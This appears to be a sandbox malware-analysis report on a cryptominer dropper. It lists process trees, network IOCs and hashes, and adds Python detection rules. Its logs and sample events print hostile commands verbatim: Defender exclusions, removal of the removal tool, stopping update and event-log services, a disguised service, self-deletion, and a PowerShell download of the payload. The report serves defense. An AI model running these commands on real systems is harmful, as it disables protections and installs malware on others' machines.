"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\doskey.exe
doskey ASSOC=ENDLOCAL
C:\Windows\system32\timeout.exe
timeout /T 10 /NOBREAK
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WindowsPower"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WindowsPower" binpath= "C:\ProgramData\windows\powershell.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WindowsPower"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\ProgramData\windows\powershell.exe
C:\ProgramData\windows\powershell.exe
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe
svchost.exe
C:\Windows\system32\doskey.exe
doskey /listsize=0
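The process list above is a compact defense-evasion chain: Defender exclusions for the user profile and ProgramData, removal of the Malicious Software Removal Tool (KB890830) via wusa, stopping the Windows Update, BITS, delivery-optimization and event-log services, disabling standby and hibernation so the miner keeps running, a service named "WindowsPower" whose binary is a powershell.exe under C:\ProgramData, and a delayed self-delete of the dropper through choice /T 3 & Del. The following Python is an added hunting example written for this report, not the sandbox's own tooling. The SAMPLE_EVENTS are constructed Sysmon-style records whose command lines are copied from the listing (pids are made up, one URL is shortened), plus two benign look-alikes that must not fire; the rule names, the TAMPER_RULES grouping and the min_rules threshold are this example's own choices.

```python
"""Hunt rules distilled from the behavioral1 process tree (added example, not report tooling)."""
import re
from typing import Any, Dict, Iterable, List, Tuple

# (rule name, case-insensitive regex over the full command line)
RULES: List[Tuple[str, str]] = [
    ("defender_exclusion_added",
     r"Add-MpPreference\b.*-Exclusion(Path|Extension|Process)"),
    ("msrt_removed_via_wusa",  # KB890830 is the Malicious Software Removal Tool
     r"\bwusa(\.exe)?\s+/uninstall\s+/kb:890830\b"),
    ("windows_update_service_stopped",
     r'\bsc(\.exe)?\s+stop\s+"?(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)"?\b'),
    ("eventlog_service_stopped",
     r'\bsc(\.exe)?\s+stop\s+"?eventlog"?\b'),
    ("sleep_hibernate_disabled",  # keeps the miner alive on laptops
     r"\bpowercfg(\.exe)?\s+/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b"),
    ("service_created_outside_system32",  # binpath not under C:\Windows\
     r'\bsc(\.exe)?\s+create\b.*binpath=\s*"?(?!"?C:\\Windows\\)[^"\s]+'),
    ("masquerading_powershell_path",  # a powershell.exe living under ProgramData
     r"C:\\ProgramData\\[^\s\"]*powershell\.exe"),
    ("self_delete_after_delay",
     r"\bchoice\s+/C\s+Y\s+/N\s+/D\s+Y\s+/T\s+\d+\s*&\s*Del\b"),
    ("powershell_webclient_download",
     r"\(New-Object\s+System\.Net\.WebClient\)\.DownloadFile\("),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]

# Rules that together indicate host tampering rather than a one-off admin action.
TAMPER_RULES = {"defender_exclusion_added", "msrt_removed_via_wusa",
                "windows_update_service_stopped", "eventlog_service_stopped",
                "sleep_hibernate_disabled", "service_created_outside_system32"}

# Constructed events: command lines copied from the report, pids invented, URL shortened.
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    {"pid": 101, "cmdline": r'''powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=...&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"'''},
    {"pid": 102, "cmdline": r'powershell.exe -nop -c "Write-Host -NoNewLine $null"'},
    {"pid": 103, "cmdline": r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"},
    {"pid": 104, "cmdline": r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"},
    {"pid": 105, "cmdline": r"C:\Windows\system32\sc.exe stop UsoSvc"},
    {"pid": 106, "cmdline": r"C:\Windows\system32\sc.exe stop WaaSMedicSvc"},
    {"pid": 107, "cmdline": r"C:\Windows\system32\sc.exe stop wuauserv"},
    {"pid": 108, "cmdline": r"C:\Windows\system32\sc.exe stop bits"},
    {"pid": 109, "cmdline": r"C:\Windows\system32\sc.exe stop dosvc"},
    {"pid": 110, "cmdline": r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0"},
    {"pid": 111, "cmdline": r'C:\Windows\system32\sc.exe create "WindowsPower" binpath= "C:\ProgramData\windows\powershell.exe" start= "auto"'},
    {"pid": 112, "cmdline": r"C:\Windows\system32\sc.exe stop eventlog"},
    {"pid": 113, "cmdline": r'C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"'},
    # Benign look-alikes (constructed) that must not fire:
    {"pid": 201, "cmdline": r"C:\Windows\system32\sc.exe stop Spooler"},
    {"pid": 202, "cmdline": r'C:\Windows\system32\sc.exe create "MyAgent" binpath= "C:\Windows\System32\agent.exe" start= auto'},
]


def scan(events: Iterable[Dict[str, Any]]) -> Dict[str, List[int]]:
    """Map each rule name to the pids whose command line matched it (insertion order kept)."""
    hits: Dict[str, List[int]] = {}
    for ev in events:
        for name, rx in COMPILED:
            if rx.search(str(ev["cmdline"])):
                hits.setdefault(name, []).append(int(ev["pid"]))
    return hits


def tamper_verdict(hits: Dict[str, List[int]], min_rules: int = 3) -> Tuple[List[str], bool]:
    """Which TAMPER_RULES fired, and whether enough of them did to call it a tamper chain."""
    fired = sorted(TAMPER_RULES & hits.keys())
    return fired, len(fired) >= min_rules


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for rule, pids in sorted(found.items()):
        print(f"{rule:36s} pids={pids}")
    print("tamper chain:", tamper_verdict(found))
```

Each rule on its own has a benign explanation (an admin adding an exclusion, a packager stopping wuauserv), which is why tamper_verdict counts distinct rules rather than raw hits; in this run every one of them fires from the same parent within seconds, and the service stop of eventlog is the one that should page someone regardless of the count.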
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 104.26.0.100:443 | get.geojs.io | tcp |
| US | 8.8.8.8:53 | 100.0.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:8888 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| DE | 95.179.241.203:8888 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
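Most rows in the table above are sandbox noise: every query goes to the 8.8.8.8 resolver, and each resolved address is followed by a reverse PTR lookup (the in-addr.arpa names) that the analysis host performs, not the malware. What remains is the Google Drive download, a geolocation check against get.geojs.io, api.telegram.org, pastebin.com, and two pool.hashvault.pro hosts on port 8888. The Python below is an added example for this report, not the sandbox's own export; SAMPLE_TABLE is the table copied verbatim, while the RESOLVER set, the WEB_PORTS notion of a "standard" port and the PUBLIC_SERVICES suffix list are this example's own assumptions.

```python
"""Reduce a sandbox network table to IOCs (added example, not report tooling)."""
import re
from typing import Any, Dict, List, Set, Tuple

ROW = re.compile(
    r"^\|\s*(?P<cc>[A-Z]{2})\s*\|\s*(?P<ip>[^|:]+):(?P<port>\d+)\s*\|"
    r"\s*(?P<domain>[^|]+?)\s*\|\s*(?P<proto>tcp|udp)\s*\|$"
)
RESOLVER = {"8.8.8.8"}          # assumption: the sandbox's DNS server, not an IOC
WEB_PORTS = {80, 443}           # assumption: anything else is worth a second look
PUBLIC_SERVICES = ("google.com", "pastebin.com", "telegram.org")  # abused, not attacker-owned

# Copied from the behavioral1 network table above.
SAMPLE_TABLE = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 104.26.0.100:443 | get.geojs.io | tcp |
| US | 8.8.8.8:53 | 100.0.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:8888 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| DE | 95.179.241.203:8888 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
"""


def extract_iocs(table: str) -> Dict[str, Dict[str, Any]]:
    """Group real destinations by domain; drop resolver traffic and sandbox PTR lookups."""
    iocs: Dict[str, Dict[str, Any]] = {}
    for line in table.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # header row or non-row text
        domain, ip, port, proto = m["domain"], m["ip"], int(m["port"]), m["proto"]
        if domain.endswith((".in-addr.arpa", ".ip6.arpa")):
            continue  # reverse lookups made by the analysis host, not the sample
        entry = iocs.setdefault(domain, {"dests": set(), "countries": set(),
                                         "nonstandard_port": False,
                                         "public_service": domain.endswith(PUBLIC_SERVICES)})
        if ip in RESOLVER and proto == "udp" and port == 53:
            continue  # the query only proves the name was looked up; keep the domain, not the resolver
        entry["dests"].add((ip, port))
        entry["countries"].add(m["cc"])
        entry["nonstandard_port"] = entry["nonstandard_port"] or port not in WEB_PORTS
    return iocs


def summarize(iocs: Dict[str, Dict[str, Any]]) -> List[str]:
    """One line per domain: destinations plus tags a blocklist reviewer cares about."""
    lines = []
    for domain, e in sorted(iocs.items()):
        tags = [t for t, on in (("nonstandard-port", e["nonstandard_port"]),
                                ("abused-public-service", e["public_service"])) if on]
        dests = " ".join(f"{ip}:{p}" for ip, p in sorted(e["dests"]))
        lines.append(f"{domain} {dests} [{', '.join(tags) or 'none'}]")
    return lines


if __name__ == "__main__":
    for row in summarize(extract_iocs(SAMPLE_TABLE)):
        print(row)
```

The split matters for what you block: pool.hashvault.pro and its two 8888 endpoints can go straight onto a denylist, whereas the three tagged abused-public-service are shared infrastructure where a domain block would break legitimate users; there the actionable detection is the process that talked to them (the RegAsm.exe and the ProgramData powershell.exe above), not the destination.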
Files
C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\kdotlbBcbF.bat
| MD5 | 68f05d3d71ea50a777d0f47e0d78cac4 |
| SHA1 | 248b8b5174d224c004a10267502f2601083ce1d5 |
| SHA256 | b8a9ea85d4dc8dfe89ffcff5c4ae7c33032de98064d7b06905938f05e212ec07 |
| SHA512 | 225e95548435e43d90637cf7ef62252cabcafe94606f726c6f3e2858c82a264e72d22a3889d84a4111bf8a8954a10c306c54c14b6b4621d355f048fc35694dab |
memory/4056-47-0x00007FFC1AAA3000-0x00007FFC1AAA4000-memory.dmp
memory/4056-49-0x000002C39C7E0000-0x000002C39C802000-memory.dmp
memory/4056-50-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/4056-51-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/4056-54-0x000002C39CA90000-0x000002C39CB06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hc3sabh5.xkf.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4056-72-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5d574dc518025fad52b7886c1bff0e13 |
| SHA1 | 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7 |
| SHA256 | 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2 |
| SHA512 | 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 37336a2069c23630c8deeba3c60a5ea3 |
| SHA1 | ed7a805a79ecf79d2479a6a9b0e61604dd7b6a28 |
| SHA256 | 57389f5f93b1fc16c2b4b047091a4b6f80c51f805799842fe152ce95a0ef38db |
| SHA512 | 8087467e753b5b47589fa35c577cc7cafd6c3406ef3521110718cfcc1705ef0b676335095016b74cebb99a83723ca7a64741e8ca3e11b2d172d3d2015d871c02 |
memory/4468-249-0x000001896FFE0000-0x000001897000A000-memory.dmp
memory/4468-268-0x000001896FFE0000-0x0000018970002000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f134b81e645d3ff8ff8bae5b72f6b4ab |
| SHA1 | 30d57ea765d7cbc632c90a115b23db9a3c93055f |
| SHA256 | e9b16760f2110783fd78f86836874575e34ed83dbb1fdef2b5c3e2aa32cf414a |
| SHA512 | dfcf8eebfbbf99c96cf37a9099a257dd11650d58e72e0201a598106aaafab6aa312da323fac6667a6092f0c1faa1e9fc3572ca875012902f211cec5ffa9d1fbd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a1fb90b3f33474d62a2d3cef79aa6301 |
| SHA1 | f1ca0362b0575a908adc19ec92b22c3b5be30a3f |
| SHA256 | 96a0b42939fe583d920430996b4dc18f3a475a2fa534a02c86ff6b9309e61068 |
| SHA512 | 0b312f78bf8effc86ea019f78e97340d4d8d71a7789813026e76b225892717b3de9b7a0aa1844072aefa6b45af7a3a4a7e6232c18f30a2fa4e63af61ca774c99 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d5ecd9138710fa9e254da38a936dc8a6 |
| SHA1 | c89fe5235f27ca9517fedca5aa4bca419aaff98c |
| SHA256 | c698ed5e40256e866801be707af25077f14b141202927a251a9509453b435416 |
| SHA512 | 672389b8f0583c86035c86712217025ec30baa78df423f65b13e098879963755c9508c1a3d4e4b6dbe5d27fdae2b971c6bd7935a84e226fe34f90732b28f37ad |
C:\Users\Admin\AppData\Local\Temp\Cache.rar
| MD5 | 6282b4c6aca3a1c55af6d1ed91d3c932 |
| SHA1 | cfb5bf824bbfd3ef9b49ef1f65c98f1f88c3a974 |
| SHA256 | a29cc0c6f3c244c8d257fa1ea5c10c463b4e26ef0f0ca010f0a917d7da69aee1 |
| SHA512 | 92ac2ec23c1dd38b8b2a76ab237e30a0dd873d23aa2aaf7856089d451a95beb632b1417deea28fb6fb98fcc025afc3efcd9679e8c2384c4eefd5abbe27de28d3 |
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
| MD5 | 643a8e965f3f1331c2902a2a451c5200 |
| SHA1 | 4a92181dc431a42e9a0c4aedb9df7c5b1b572173 |
| SHA256 | 61c29cf71d338ee070804f4ec0e60f93dd2056840c95c9497bb03cf81a590ad5 |
| SHA512 | 194f9c946d4d06bbe8a89999716024b79cd66df9da2c11e503cee216004e44fad01317229a84618a0cc406deb40ec7e23e1e53e23c426b2e6f2b3107e8f1baf1 |
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
| MD5 | acc0ec089c7623d1460d205a9e45a1d9 |
| SHA1 | 7abdb88df37e63cdaf4b6c99d2ec9c56d48815f8 |
| SHA256 | 169ab660aad03e63b1db2619e471ed8679a6975c7d1d23f639b1b052a62c80fc |
| SHA512 | 3201636fc8808dcf6683125555365dd0cbef25dfd5fe934c090eaf120107cee53a762a9ee0b2946f4feb1a74a7ee36a1daaae3187a15c278a2b00fc27b64c7e4 |
memory/3828-366-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3828-367-0x0000000004DB0000-0x0000000004E16000-memory.dmp
memory/3828-368-0x00000000056D0000-0x0000000005762000-memory.dmp
memory/3828-369-0x00000000067F0000-0x0000000006CEE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 463102aaa11412dce1fa4e6f5f58986f |
| SHA1 | 962bb55bda97f82875c9e2e3e9c9d5c93e77aed7 |
| SHA256 | 64354cc782f1b4d5aa45b416296ea0be23a164c4be716e0714f8c0ba9f0740b6 |
| SHA512 | 9cf6a0c7d7b9237bf1b4a7b7f3cbf549ba41bbcccbd409f7f27658789ecb49969aa808126d4bfb5410b19c1341297469a9a702877d5394a9de9ae9080193540d |
memory/4944-440-0x00000227AF510000-0x00000227AF52C000-memory.dmp
memory/4944-446-0x00000227AF6D0000-0x00000227AF789000-memory.dmp
memory/4944-479-0x00000227AF530000-0x00000227AF53A000-memory.dmp
memory/4980-574-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4980-577-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2188-578-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-585-0x0000021FDB350000-0x0000021FDB370000-memory.dmp
memory/2188-582-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-579-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4980-573-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4980-572-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4980-571-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4980-570-0x0000000140000000-0x000000014000D000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | 747d7ddd27f695f5e07df8ff9bc44e28 |
| SHA1 | c33048412255744c3de6292238eae196791be25e |
| SHA256 | 8dac7d9b38f2811c76652717c7f93c2a6390f031149ed850ae9ddb7dedcfca55 |
| SHA512 | ca85efa05980bba8ced81cb41a66e05821a2a55382142bffd27e8945a34d0ec89a6e221f0f5e381c877adc8d639863c9c837b74401f8096af5e9417580766ffa |
memory/2188-584-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-583-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-589-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-590-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-588-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-587-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-586-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-581-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-580-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-593-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-594-0x0000000140000000-0x0000000140848000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
136s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\assets.rar
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240611-en
Max time kernel
69s
Max time network
76s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\04\3d0cb49d33b9bb2462ad183f65e2e11aea3c1eff — копия (4) — копия"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
130s
Max time network
141s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\natives.rar
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
130s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\glfw.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |